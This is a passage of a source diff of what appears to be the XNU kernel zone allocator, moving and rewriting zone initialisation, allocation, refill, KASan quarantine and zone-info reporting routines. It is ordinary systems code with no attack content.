names_size, used_zones * sizeof *names); + *namesCntp = used_zones; - zone_create_flags_t kma_flags = ZC_NOCACHING | - ZC_NOGC | ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT | - ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE; + *infop = (mach_zone_info_t *) create_vm_map_copy(info_addr, info_size, used_zones * sizeof *info); + *infoCntp = used_zones; - (void)zone_create_ext("vm.permanent", 1, kma_flags, - ZONE_ID_PERMANENT, ^(zone_t z){ - z->permanent = true; - z->z_elem_size = 1; - z->pcpu_elem_size = 1; -#if defined(__LP64__) - z->submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED_MAP; -#endif - }); - (void)zone_create_ext("vm.permanent.percpu", 1, kma_flags | ZC_PERCPU, - ZONE_ID_PERCPU_PERMANENT, ^(zone_t z){ - z->permanent = true; - z->z_elem_size = 1; - z->pcpu_elem_size = zpercpu_count(); -#if defined(__LP64__) - z->submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED_MAP; -#endif - }); + num_info = 0; + memory_info_addr = 0; - /* - * Now fix the zones that are missing their zone stats - * we don't really know if zfree()s happened so our stats - * are slightly off for early boot. 
¯\_(ツ)_/¯ - */ - zone_index_foreach(idx) { - zone_t tz = &zone_array[idx]; + if (memoryInfop && memoryInfoCntp) { + vm_map_copy_t copy; + num_info = vm_page_diagnose_estimate(); + memory_info_size = num_info * sizeof(*memory_info); + memory_info_vmsize = round_page(memory_info_size); + kr = kmem_alloc_pageable(ipc_kernel_map, + &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + return kr; + } - if (tz->z_self) { - zone_stats_t zs = zalloc_percpu_permanent_type(struct zone_stats); + kr = vm_map_wire_kernel(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, + VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE); + assert(kr == KERN_SUCCESS); - zpercpu_get_cpu(zs, 0)->zs_mem_allocated += - (tz->countavail - tz->countfree) * - zone_elem_size(tz); - assert(tz->z_stats == NULL); - tz->z_stats = zs; -#if ZONE_ENABLE_LOGGING - if (tz->zone_logging && !tz->zlog_btlog) { - zone_enable_logging(tz); - } -#endif - } - } + memory_info = (mach_memory_info_t *) memory_info_addr; + vm_page_diagnose(memory_info, num_info, zones_collectable_bytes); -#if CONFIG_ZLEAKS - /* - * Initialize the zone leak monitor - */ - zleak_init(zone_map_size); -#endif /* CONFIG_ZLEAKS */ + kr = vm_map_unwire(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, FALSE); + assert(kr == KERN_SUCCESS); -#if VM_MAX_TAG_ZONES - if (zone_tagging_on) { - vm_allocation_zones_init(); - } -#endif -} -STARTUP(ZALLOC, STARTUP_RANK_FIRST, zone_init); + kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)memory_info_addr, + (vm_map_size_t)memory_info_size, TRUE, ©); + assert(kr == KERN_SUCCESS); -__startup_func -static void -zone_set_foreign_range( - vm_offset_t range_min, - vm_offset_t range_max) -{ - zone_info.zi_foreign_range.min_address = range_min; - zone_info.zi_foreign_range.max_address = range_max; -} + *memoryInfop = (mach_memory_info_t *) copy; + *memoryInfoCntp = num_info; + } -__startup_func -vm_offset_t 
-zone_foreign_mem_init(vm_size_t size) -{ - vm_offset_t mem = (vm_offset_t) pmap_steal_memory(size); - zone_set_foreign_range(mem, mem + size); - return mem; + return KERN_SUCCESS; } -#pragma mark zalloc - -#if KASAN_ZALLOC -/* - * Called from zfree() to add the element being freed to the KASan quarantine. - * - * Returns true if the newly-freed element made it into the quarantine without - * displacing another, false otherwise. In the latter case, addrp points to the - * address of the displaced element, which will be freed by the zone. - */ -static bool -kasan_quarantine_freed_element( - zone_t *zonep, /* the zone the element is being freed to */ - void **addrp) /* address of the element being freed */ +kern_return_t +mach_zone_info_for_zone( + host_priv_t host, + mach_zone_name_t name, + mach_zone_info_t *infop) { - zone_t zone = *zonep; - void *addr = *addrp; - - /* - * Resize back to the real allocation size and hand off to the KASan - * quarantine. `addr` may then point to a different allocation, if the - * current element replaced another in the quarantine. The zone then - * takes ownership of the swapped out free element. 
- */ - vm_size_t usersz = zone_elem_size(zone) - 2 * zone->kasan_redzone; - vm_size_t sz = usersz; + zone_t zone_ptr; - if (addr && zone->kasan_redzone) { - kasan_check_free((vm_address_t)addr, usersz, KASAN_HEAP_ZALLOC); - addr = (void *)kasan_dealloc((vm_address_t)addr, &sz); - assert(sz == zone_elem_size(zone)); - } - if (addr && !zone->kasan_noquarantine) { - kasan_free(&addr, &sz, KASAN_HEAP_ZALLOC, zonep, usersz, true); - if (!addr) { - return TRUE; - } + if (host == HOST_NULL) { + return KERN_INVALID_HOST; } - if (addr && zone->kasan_noquarantine) { - kasan_unpoison(addr, zone_elem_size(zone)); +#if CONFIG_DEBUGGER_FOR_ZONE_INFO + if (!PE_i_can_has_debugger(NULL)) { + return KERN_INVALID_HOST; } - *addrp = addr; - return FALSE; -} - -#endif /* KASAN_ZALLOC */ +#endif -static inline bool -zone_needs_async_refill(zone_t zone) -{ - if (zone->countfree != 0 || zone->async_pending || zone->no_callout) { - return false; + if (infop == NULL) { + return KERN_INVALID_ARGUMENT; } - return zone->expandable || zone->page_count < zone->page_count_max; -} - -__attribute__((noinline)) -static void -zone_refill_synchronously_locked( - zone_t zone, - zalloc_flags_t flags) -{ - thread_t thr = current_thread(); - bool set_expanding_vm_priv = false; - zone_pva_t orig = zone->pages_intermediate; - - while ((flags & Z_NOWAIT) == 0 && (zone->permanent - ? zone_pva_is_equal(zone->pages_intermediate, orig) - : zone->countfree == 0)) { + zone_ptr = ZONE_NULL; + zone_foreach(z) { /* - * zone is empty, try to expand it - * - * Note that we now allow up to 2 threads (1 vm_privliged and - * 1 non-vm_privliged) to expand the zone concurrently... - * - * this is necessary to avoid stalling vm_privileged threads - * running critical code necessary to continue - * compressing/swapping pages (i.e. making new free pages) from - * stalling behind non-vm_privileged threads waiting to acquire - * free pages when the vm_page_free_count is below the - * vm_page_free_reserved limit. 
+ * Append kalloc heap name to zone name (if zone is used by kalloc) */ - if ((zone->expanding_no_vm_priv || zone->expanding_vm_priv) && - (((thr->options & TH_OPT_VMPRIV) == 0) || zone->expanding_vm_priv)) { - /* - * This is a non-vm_privileged thread and a non-vm_privileged or - * a vm_privileged thread is already expanding the zone... - * OR - * this is a vm_privileged thread and a vm_privileged thread is - * already expanding the zone... - * - * In either case wait for a thread to finish, then try again. - */ - zone->waiting = true; - assert_wait(zone, THREAD_UNINT); - unlock_zone(zone); - thread_block(THREAD_CONTINUE_NULL); - lock_zone(zone); - continue; - } - - if (zone->page_count >= zone->page_count_max) { - if (zone->exhaustible) { - break; - } - if (zone->expandable) { - /* - * If we're expandable, just don't go through this again. - */ - zone->page_count_max = ~0u; - } else { - unlock_zone(zone); + char temp_zone_name[MAX_ZONE_NAME] = ""; + snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", + zone_heap_name(z), z->z_name); - panic_include_zprint = true; -#if CONFIG_ZLEAKS - if (zleak_state & ZLEAK_STATE_ACTIVE) { - panic_include_ztrace = true; - } -#endif /* CONFIG_ZLEAKS */ - panic("zalloc: zone \"%s\" empty.", zone->z_name); - } + /* Find the requested zone by name */ + if (track_this_zone(temp_zone_name, name.mzn_name)) { + zone_ptr = z; + break; } + } - /* - * It is possible that a BG thread is refilling/expanding the zone - * and gets pre-empted during that operation. That blocks all other - * threads from making progress leading to a watchdog timeout. 
To - * avoid that, boost the thread priority using the rwlock boost - */ - set_thread_rwlock_boost(); + /* No zones found with the requested zone name */ + if (zone_ptr == ZONE_NULL) { + return KERN_INVALID_ARGUMENT; + } - if ((thr->options & TH_OPT_VMPRIV)) { - zone->expanding_vm_priv = true; - set_expanding_vm_priv = true; - } else { - zone->expanding_no_vm_priv = true; - } + if (get_zone_info(zone_ptr, NULL, infop)) { + return KERN_SUCCESS; + } + return KERN_FAILURE; +} - zone_replenish_locked(zone, flags, false); +kern_return_t +mach_zone_info_for_largest_zone( + host_priv_t host, + mach_zone_name_t *namep, + mach_zone_info_t *infop) +{ + if (host == HOST_NULL) { + return KERN_INVALID_HOST; + } +#if CONFIG_DEBUGGER_FOR_ZONE_INFO + if (!PE_i_can_has_debugger(NULL)) { + return KERN_INVALID_HOST; + } +#endif - if (set_expanding_vm_priv == true) { - zone->expanding_vm_priv = false; - } else { - zone->expanding_no_vm_priv = false; - } + if (namep == NULL || infop == NULL) { + return KERN_INVALID_ARGUMENT; + } - if (zone->waiting) { - zone->waiting = false; - thread_wakeup(zone); - } - clear_thread_rwlock_boost(); + if (get_zone_info(zone_find_largest(), namep, infop)) { + return KERN_SUCCESS; + } + return KERN_FAILURE; +} + +uint64_t +get_zones_collectable_bytes(void) +{ + uint64_t zones_collectable_bytes = 0; + mach_zone_info_t zi; - if (zone->countfree == 0) { - assert(flags & Z_NOPAGEWAIT); - break; + zone_foreach(z) { + if (get_zone_info(z, NULL, &zi)) { + zones_collectable_bytes += + GET_MZI_COLLECTABLE_BYTES(zi.mzi_collectable); } } - if ((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) && - zone_needs_async_refill(zone) && !vm_pool_low()) { - zone->async_pending = true; - unlock_zone(zone); - thread_call_enter(&call_async_alloc); - lock_zone(zone); - assert(zone->z_self == zone); - } + return zones_collectable_bytes; } -__attribute__((noinline)) -static void -zone_refill_asynchronously_locked(zone_t zone) +kern_return_t +mach_zone_get_zlog_zones( + host_priv_t host, + 
mach_zone_name_array_t *namesp, + mach_msg_type_number_t *namesCntp) { - uint32_t min_free = zone->prio_refill_count / 2; - uint32_t resv_free = zone->prio_refill_count / 4; - thread_t thr = current_thread(); +#if ZONE_ENABLE_LOGGING + unsigned int max_zones, logged_zones, i; + kern_return_t kr; + zone_t zone_ptr; + mach_zone_name_t *names; + vm_offset_t names_addr; + vm_size_t names_size; - /* - * Nothing to do if there are plenty of elements. - */ - while (zone->countfree <= min_free) { - /* - * Wakeup the replenish thread if not running. - */ - if (!zone->zone_replenishing) { - lck_spin_lock(&zone_replenish_lock); - assert(zone_replenish_active < zone_replenish_max_threads); - ++zone_replenish_active; - lck_spin_unlock(&zone_replenish_lock); - zone->zone_replenishing = true; - zone_replenish_wakeups_initiated++; - thread_wakeup(&zone->prio_refill_count); - } + if (host == HOST_NULL) { + return KERN_INVALID_HOST; + } - /* - * We'll let VM_PRIV threads to continue to allocate until the - * reserve drops to 25%. After that only TH_OPT_ZONE_PRIV threads - * may continue. - * - * TH_OPT_ZONE_PRIV threads are the GC thread and a replenish thread itself. - * Replenish threads *need* to use the reserve. GC threads need to - * get through the current allocation, but then will wait at a higher - * level after they've dropped any locks which would deadlock the - * replenish thread. - */ - if ((zone->countfree > resv_free && (thr->options & TH_OPT_VMPRIV)) || - (thr->options & TH_OPT_ZONE_PRIV)) { - break; - } + if (namesp == NULL || namesCntp == NULL) { + return KERN_INVALID_ARGUMENT; + } - /* - * Wait for the replenish threads to add more elements for us to allocate from. 
- */ - zone_replenish_throttle_count++; - unlock_zone(zone); - assert_wait_timeout(zone, THREAD_UNINT, 1, NSEC_PER_MSEC); - thread_block(THREAD_CONTINUE_NULL); - lock_zone(zone); + max_zones = os_atomic_load(&num_zones, relaxed); - assert(zone->z_self == zone); + names_size = round_page(max_zones * sizeof *names); + kr = kmem_alloc_pageable(ipc_kernel_map, + &names_addr, names_size, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + return kr; } + names = (mach_zone_name_t *) names_addr; - /* - * If we're here because of zone_gc(), we didn't wait for - * zone_replenish_thread to finish. So we need to ensure that - * we will successfully grab an element. - * - * zones that have a replenish thread configured. - * The value of (refill_level / 2) in the previous bit of code should have - * given us headroom even though this thread didn't wait. - */ - if (thr->options & TH_OPT_ZONE_PRIV) { - assert(zone->countfree != 0); + zone_ptr = ZONE_NULL; + logged_zones = 0; + for (i = 0; i < max_zones; i++) { + zone_t z = &(zone_array[i]); + assert(z != ZONE_NULL); + + /* Copy out the zone name if zone logging is enabled */ + if (z->zlog_btlog) { + get_zone_info(z, &names[logged_zones], NULL); + logged_zones++; + } } + + *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, logged_zones * sizeof *names); + *namesCntp = logged_zones; + + return KERN_SUCCESS; + +#else /* ZONE_ENABLE_LOGGING */ +#pragma unused(host, namesp, namesCntp) + return KERN_FAILURE; +#endif /* ZONE_ENABLE_LOGGING */ } -#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS -__attribute__((noinline)) -static void -zalloc_log_or_trace_leaks(zone_t zone, vm_offset_t addr) +kern_return_t +mach_zone_get_btlog_records( + host_priv_t host, + mach_zone_name_t name, + zone_btrecord_array_t *recsp, + mach_msg_type_number_t *recsCntp) { - uintptr_t zbt[MAX_ZTRACE_DEPTH]; /* used in zone leak logging and zone leak detection */ - unsigned int numsaved = 0; +#if DEBUG || DEVELOPMENT + unsigned int numrecs = 0; + 
zone_btrecord_t *recs; + kern_return_t kr; + zone_t zone_ptr; + vm_offset_t recs_addr; + vm_size_t recs_size; -#if ZONE_ENABLE_LOGGING - if (DO_LOGGING(zone)) { - numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, - __builtin_frame_address(0), NULL); - btlog_add_entry(zone->zlog_btlog, (void *)addr, - ZOP_ALLOC, (void **)zbt, numsaved); + if (host == HOST_NULL) { + return KERN_INVALID_HOST; } -#endif -#if CONFIG_ZLEAKS - /* - * Zone leak detection: capture a backtrace every zleak_sample_factor - * allocations in this zone. - */ - if (__improbable(zone->zleak_on)) { - if (sample_counter(&zone->zleak_capture, zleak_sample_factor)) { - /* Avoid backtracing twice if zone logging is on */ - if (numsaved == 0) { - numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, - __builtin_frame_address(1), NULL); - } - /* Sampling can fail if another sample is happening at the same time in a different zone. */ - if (!zleak_log(zbt, addr, numsaved, zone_elem_size(zone))) { - /* If it failed, roll back the counter so we sample the next allocation instead. 
*/ - zone->zleak_capture = zleak_sample_factor; - } - } + if (recsp == NULL || recsCntp == NULL) { + return KERN_INVALID_ARGUMENT; } - if (__improbable(zone_leaks_scan_enable && - !(zone_elem_size(zone) & (sizeof(uintptr_t) - 1)))) { - unsigned int count, idx; - /* Fill element, from tail, with backtrace in reverse order */ - if (numsaved == 0) { - numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, - __builtin_frame_address(1), NULL); - } - count = (unsigned int)(zone_elem_size(zone) / sizeof(uintptr_t)); - if (count >= numsaved) { - count = numsaved - 1; - } - for (idx = 0; idx < count; idx++) { - ((uintptr_t *)addr)[count - 1 - idx] = zbt[idx + 1]; + zone_ptr = ZONE_NULL; + zone_foreach(z) { + /* + * Append kalloc heap name to zone name (if zone is used by kalloc) + */ + char temp_zone_name[MAX_ZONE_NAME] = ""; + snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", + zone_heap_name(z), z->z_name); + + /* Find the requested zone by name */ + if (track_this_zone(temp_zone_name, name.mzn_name)) { + zone_ptr = z; + break; } } -#endif /* CONFIG_ZLEAKS */ -} -static inline bool -zalloc_should_log_or_trace_leaks(zone_t zone, vm_size_t elem_size) -{ -#if ZONE_ENABLE_LOGGING - if (DO_LOGGING(zone)) { - return true; + /* No zones found with the requested zone name */ + if (zone_ptr == ZONE_NULL) { + return KERN_INVALID_ARGUMENT; } -#endif -#if CONFIG_ZLEAKS - /* - * Zone leak detection: capture a backtrace every zleak_sample_factor - * allocations in this zone. 
- */ - if (zone->zleak_on) { - return true; + + /* Logging not turned on for the requested zone */ + if (!DO_LOGGING(zone_ptr)) { + return KERN_FAILURE; } - if (zone_leaks_scan_enable && !(elem_size & (sizeof(uintptr_t) - 1))) { - return true; + + /* Allocate memory for btlog records */ + numrecs = (unsigned int)(get_btlog_records_count(zone_ptr->zlog_btlog)); + recs_size = round_page(numrecs * sizeof *recs); + + kr = kmem_alloc_pageable(ipc_kernel_map, &recs_addr, recs_size, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + return kr; } -#endif /* CONFIG_ZLEAKS */ - return false; -} -#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */ -#if ZONE_ENABLE_LOGGING -__attribute__((noinline)) -static void -zfree_log_trace(zone_t zone, vm_offset_t addr) -{ /* - * See if we're doing logging on this zone. - * - * There are two styles of logging used depending on - * whether we're trying to catch a leak or corruption. + * We will call get_btlog_records() below which populates this region while holding a spinlock + * (the btlog lock). So these pages need to be wired. */ - if (__improbable(DO_LOGGING(zone))) { - if (corruption_debug_flag) { - uintptr_t zbt[MAX_ZTRACE_DEPTH]; - unsigned int numsaved; - /* - * We're logging to catch a corruption. - * - * Add a record of this zfree operation to log. - */ - numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, - __builtin_frame_address(1), NULL); - btlog_add_entry(zone->zlog_btlog, (void *)addr, ZOP_FREE, - (void **)zbt, numsaved); - } else { - /* - * We're logging to catch a leak. - * - * Remove any record we might have for this element - * since it's being freed. Note that we may not find it - * if the buffer overflowed and that's OK. - * - * Since the log is of a limited size, old records get - * overwritten if there are more zallocs than zfrees. 
- */ - btlog_remove_entries_for_element(zone->zlog_btlog, (void *)addr); - } - } -} -#endif /* ZONE_ENABLE_LOGGING */ + kr = vm_map_wire_kernel(ipc_kernel_map, recs_addr, recs_addr + recs_size, + VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE); + assert(kr == KERN_SUCCESS); -/* - * Removes an element from the zone's free list, returning 0 if the free list is empty. - * Verifies that the next-pointer and backup next-pointer are intact, - * and verifies that a poisoned element hasn't been modified. - */ -vm_offset_t -zalloc_direct_locked( - zone_t zone, - zalloc_flags_t flags __unused, - vm_size_t waste __unused) -{ - struct zone_page_metadata *page_meta; - zone_addr_kind_t kind = ZONE_ADDR_NATIVE; - vm_offset_t element, page, validate_bit = 0; - - /* if zone is empty, bail */ - if (!zone_pva_is_null(zone->pages_any_free_foreign)) { - kind = ZONE_ADDR_FOREIGN; - page_meta = zone_pva_to_meta(zone->pages_any_free_foreign, kind); - page = (vm_offset_t)page_meta; - } else if (!zone_pva_is_null(zone->pages_intermediate)) { - page_meta = zone_pva_to_meta(zone->pages_intermediate, kind); - page = zone_pva_to_addr(zone->pages_intermediate); - } else if (!zone_pva_is_null(zone->pages_all_free)) { - page_meta = zone_pva_to_meta(zone->pages_all_free, kind); - page = zone_pva_to_addr(zone->pages_all_free); - if (os_sub_overflow(zone->allfree_page_count, - page_meta->zm_page_count, &zone->allfree_page_count)) { - zone_accounting_panic(zone, "allfree_page_count wrap-around"); - } - } else { - zone_accounting_panic(zone, "countfree corruption"); - } + recs = (zone_btrecord_t *)recs_addr; + get_btlog_records(zone_ptr->zlog_btlog, recs, &numrecs); - if (!zone_has_index(zone, page_meta->zm_index)) { - zone_page_metadata_index_confusion_panic(zone, page, page_meta); - } + kr = vm_map_unwire(ipc_kernel_map, recs_addr, recs_addr + recs_size, FALSE); + assert(kr == KERN_SUCCESS); - element = zone_page_meta_get_freelist(zone, page_meta, page); + *recsp = (zone_btrecord_t *) 
create_vm_map_copy(recs_addr, recs_size, numrecs * sizeof *recs); + *recsCntp = numrecs; - vm_offset_t *primary = (vm_offset_t *) element; - vm_offset_t *backup = get_backup_ptr(zone_elem_size(zone), primary); + return KERN_SUCCESS; - /* - * since the primary next pointer is xor'ed with zp_nopoison_cookie - * for obfuscation, retrieve the original value back - */ - vm_offset_t next_element = *primary ^ zp_nopoison_cookie; - vm_offset_t next_element_primary = *primary; - vm_offset_t next_element_backup = *backup; +#else /* DEBUG || DEVELOPMENT */ +#pragma unused(host, name, recsp, recsCntp) + return KERN_FAILURE; +#endif /* DEBUG || DEVELOPMENT */ +} + + +#if DEBUG || DEVELOPMENT + +kern_return_t +mach_memory_info_check(void) +{ + mach_memory_info_t * memory_info; + mach_memory_info_t * info; + unsigned int num_info; + vm_offset_t memory_info_addr; + kern_return_t kr; + size_t memory_info_size, memory_info_vmsize; + uint64_t top_wired, zonestotal, total; - /* - * backup_ptr_mismatch_panic will determine what next_element - * should have been, and print it appropriately - */ - if (!zone_page_meta_is_sane_element(zone, page_meta, page, next_element, kind)) { - backup_ptr_mismatch_panic(zone, page_meta, page, element); - } + num_info = vm_page_diagnose_estimate(); + memory_info_size = num_info * sizeof(*memory_info); + memory_info_vmsize = round_page(memory_info_size); + kr = kmem_alloc(kernel_map, &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_DIAG); + assert(kr == KERN_SUCCESS); - /* Check the backup pointer for the regular cookie */ - if (__improbable(next_element_primary != next_element_backup)) { - /* Check for the poisoned cookie instead */ - if (__improbable(next_element != (next_element_backup ^ zp_poisoned_cookie))) { - /* Neither cookie is valid, corruption has occurred */ - backup_ptr_mismatch_panic(zone, page_meta, page, element); - } + memory_info = (mach_memory_info_t *) memory_info_addr; + vm_page_diagnose(memory_info, num_info, 0); - /* - * 
Element was marked as poisoned, so check its integrity before using it. - */ - validate_bit = ZALLOC_ELEMENT_NEEDS_VALIDATION; - } else if (zone->zfree_clear_mem) { - validate_bit = ZALLOC_ELEMENT_NEEDS_VALIDATION; + top_wired = total = zonestotal = 0; + zone_foreach(z) { + zonestotal += zone_size_wired(z); } - /* Remove this element from the free list */ - zone_page_meta_set_freelist(page_meta, page, next_element); - - if (kind == ZONE_ADDR_FOREIGN) { - if (next_element == 0) { - /* last foreign element allocated on page, move to all_used_foreign */ - zone_meta_requeue(zone, &zone->pages_all_used_foreign, page_meta, kind); + for (uint32_t idx = 0; idx < num_info; idx++) { + info = &memory_info[idx]; + if (!info->size) { + continue; + } + if (VM_KERN_COUNT_WIRED == info->site) { + top_wired = info->size; + } + if (VM_KERN_SITE_HIDE & info->flags) { + continue; + } + if (!(VM_KERN_SITE_WIRED & info->flags)) { + continue; } - } else if (next_element == 0) { - zone_meta_requeue(zone, &zone->pages_all_used, page_meta, kind); - } else if (page_meta->zm_alloc_count == 0) { - /* remove from free, move to intermediate */ - zone_meta_requeue(zone, &zone->pages_intermediate, page_meta, kind); + total += info->size; } + total += zonestotal; - if (os_add_overflow(page_meta->zm_alloc_count, 1, - &page_meta->zm_alloc_count)) { - /* - * This will not catch a lot of errors, the proper check - * would be against the number of elements this run should - * have which is expensive to count. - * - * But zm_alloc_count is a 16 bit number which could - * theoretically be valuable to cause to wrap around, - * so catch this. 
- */ - zone_page_meta_accounting_panic(zone, page_meta, - "zm_alloc_count overflow"); - } - if (os_sub_overflow(zone->countfree, 1, &zone->countfree)) { - zone_accounting_panic(zone, "countfree wrap-around"); - } + printf("vm_page_diagnose_check %qd of %qd, zones %qd, short 0x%qx\n", + total, top_wired, zonestotal, top_wired - total); -#if VM_MAX_TAG_ZONES - if (__improbable(zone->tags)) { - vm_tag_t tag = zalloc_flags_get_tag(flags); - // set the tag with b0 clear so the block remains inuse - ZTAG(zone, element)[0] = (vm_tag_t)(tag << 1); - vm_tag_update_zone_size(tag, zone->tag_zone_index, - zone_elem_size(zone), waste); - } -#endif /* VM_MAX_TAG_ZONES */ -#if KASAN_ZALLOC - if (zone->percpu) { - zpercpu_foreach_cpu(i) { - kasan_poison_range(element + ptoa(i), - zone_elem_size(zone), ASAN_VALID); - } - } else { - kasan_poison_range(element, zone_elem_size(zone), ASAN_VALID); - } -#endif + kmem_free(kernel_map, memory_info_addr, memory_info_vmsize); - return element | validate_bit; + return kr; } -/* - * zalloc returns an element from the specified zone. - * - * The function is noinline when zlog can be used so that the backtracing can - * reliably skip the zalloc_ext() and zalloc_log_or_trace_leaks() - * boring frames. - */ -#if ZONE_ENABLE_LOGGING -__attribute__((noinline)) -#endif -void * -zalloc_ext( - zone_t zone, - zone_stats_t zstats, - zalloc_flags_t flags, - vm_size_t waste) -{ - vm_offset_t addr = 0; - vm_size_t elem_size = zone_elem_size(zone); - - /* - * KASan uses zalloc() for fakestack, which can be called anywhere. - * However, we make sure these calls can never block. 
- */ - assert(zone->kasan_fakestacks || - ml_get_interrupts_enabled() || - ml_is_quiescing() || - debug_mode_active() || - startup_phase < STARTUP_SUB_EARLY_BOOT); +extern boolean_t(*volatile consider_buffer_cache_collect)(int); - /* - * Make sure Z_NOFAIL was not obviously misused - */ - if ((flags & Z_NOFAIL) && !zone->prio_refill_count) { - assert(!zone->exhaustible && (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0); - } +#endif /* DEBUG || DEVELOPMENT */ -#if CONFIG_ZCACHE - /* - * Note: if zone caching is on, gzalloc and tags aren't used - * so we can always check this first - */ - if (zone_caching_enabled(zone)) { - addr = zcache_alloc_from_cpu_cache(zone, zstats, waste); - if (__probable(addr)) { - goto allocated_from_cache; - } +kern_return_t +mach_zone_force_gc( + host_t host) +{ + if (host == HOST_NULL) { + return KERN_INVALID_HOST; } -#endif /* CONFIG_ZCACHE */ -#if CONFIG_GZALLOC - if (__improbable(zone->gzalloc_tracked)) { - addr = gzalloc_alloc(zone, zstats, flags); - goto allocated_from_gzalloc; - } -#endif /* CONFIG_GZALLOC */ -#if VM_MAX_TAG_ZONES - if (__improbable(zone->tags)) { - vm_tag_t tag = zalloc_flags_get_tag(flags); - if (tag == VM_KERN_MEMORY_NONE) { - /* - * zone views into heaps can lead to a site-less call - * and we fallback to KALLOC as a tag for those. - */ - tag = VM_KERN_MEMORY_KALLOC; - flags |= Z_VM_TAG(tag); - } - vm_tag_will_update_zone(tag, zone->tag_zone_index); +#if DEBUG || DEVELOPMENT + /* Callout to buffer cache GC to drop elements in the apfs zones */ + if (consider_buffer_cache_collect != NULL) { + (void)(*consider_buffer_cache_collect)(0); } -#endif /* VM_MAX_TAG_ZONES */ - - lock_zone(zone); - assert(zone->z_self == zone); + zone_gc(ZONE_GC_DRAIN); +#endif /* DEBUG || DEVELOPMENT */ + return KERN_SUCCESS; +} - /* - * Check if we need another thread to replenish the zone or - * if we have to wait for a replenish thread to finish. 
- * This is used for elements, like vm_map_entry, which are - * needed themselves to implement zalloc(). - */ - if (__improbable(zone->prio_refill_count && - zone->countfree <= zone->prio_refill_count / 2)) { - zone_refill_asynchronously_locked(zone); - } else if (__improbable(zone->countfree == 0)) { - zone_refill_synchronously_locked(zone, flags); - if (__improbable(zone->countfree == 0)) { - unlock_zone(zone); - if (__improbable(flags & Z_NOFAIL)) { - zone_nofail_panic(zone); - } - goto out_nomem; - } - } +zone_t +zone_find_largest(void) +{ + uint32_t largest_idx = 0; + vm_offset_t largest_size = zone_size_wired(&zone_array[0]); - addr = zalloc_direct_locked(zone, flags, waste); - if (__probable(zstats != NULL)) { - /* - * The few vm zones used before zone_init() runs do not have - * per-cpu stats yet - */ - int cpu = cpu_number(); - zpercpu_get_cpu(zstats, cpu)->zs_mem_allocated += elem_size; -#if ZALLOC_DETAILED_STATS - if (waste) { - zpercpu_get_cpu(zstats, cpu)->zs_mem_wasted += waste; + zone_index_foreach(i) { + vm_offset_t size = zone_size_wired(&zone_array[i]); + if (size > largest_size) { + largest_idx = i; + largest_size = size; } -#endif /* ZALLOC_DETAILED_STATS */ } - unlock_zone(zone); - -#if ZALLOC_ENABLE_POISONING - bool validate = addr & ZALLOC_ELEMENT_NEEDS_VALIDATION; -#endif - addr &= ~ZALLOC_ELEMENT_NEEDS_VALIDATION; - zone_clear_freelist_pointers(zone, addr); -#if ZALLOC_ENABLE_POISONING - /* - * Note: percpu zones do not respect ZONE_MIN_ELEM_SIZE, - * so we will check the first word even if we just - * cleared it. 
- */ - zalloc_validate_element(zone, addr, elem_size - sizeof(vm_offset_t), - validate); -#endif /* ZALLOC_ENABLE_POISONING */ + return &zone_array[largest_idx]; +} -allocated_from_cache: -#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS - if (__improbable(zalloc_should_log_or_trace_leaks(zone, elem_size))) { - zalloc_log_or_trace_leaks(zone, addr); - } -#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */ +#endif /* !ZALLOC_TEST */ +#pragma mark zone creation, configuration, destruction +#if !ZALLOC_TEST -#if CONFIG_GZALLOC -allocated_from_gzalloc: -#endif -#if KASAN_ZALLOC - if (zone->kasan_redzone) { - addr = kasan_alloc(addr, elem_size, - elem_size - 2 * zone->kasan_redzone, zone->kasan_redzone); - elem_size -= 2 * zone->kasan_redzone; - } - /* - * Initialize buffer with unique pattern only if memory - * wasn't expected to be zeroed. - */ - if (!zone->zfree_clear_mem && !(flags & Z_ZERO)) { - kasan_leak_init(addr, elem_size); - } -#endif /* KASAN_ZALLOC */ - if ((flags & Z_ZERO) && !zone->zfree_clear_mem) { - bzero((void *)addr, elem_size); - } +static zone_t +zone_init_defaults(zone_id_t zid) +{ + zone_t z = &zone_array[zid]; - TRACE_MACHLEAKS(ZALLOC_CODE, ZALLOC_CODE_2, elem_size, addr); + z->z_wired_max = ~0u; + z->collectable = true; + z->expandable = true; + z->z_submap_idx = Z_SUBMAP_IDX_GENERAL; -out_nomem: - DTRACE_VM2(zalloc, zone_t, zone, void*, addr); - return (void *)addr; + lck_spin_init(&z->z_lock, &zone_locks_grp, LCK_ATTR_NULL); + STAILQ_INIT(&z->z_recirc); + return z; } -void * -zalloc(union zone_or_view zov) +static bool +zone_is_initializing(zone_t z) { - return zalloc_flags(zov, Z_WAITOK); + return !z->z_self && !z->z_destroyed; } -void * -zalloc_noblock(union zone_or_view zov) +void +zone_set_submap_idx(zone_t zone, unsigned int sub_map_idx) { - return zalloc_flags(zov, Z_NOWAIT); + if (!zone_is_initializing(zone)) { + panic("%s: called after zone_create()", __func__); + } + if (sub_map_idx > zone_last_submap_idx) { + panic("zone_set_submap_idx(%d) > 
